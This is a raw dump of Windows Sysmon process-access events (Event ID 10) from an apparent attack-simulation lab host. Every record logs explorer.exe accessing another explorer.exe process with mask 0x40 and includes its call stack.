16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.622{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.622{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.622{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.622{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.621{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.621{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.621{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.621{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.621{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.621{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.621{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.621{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 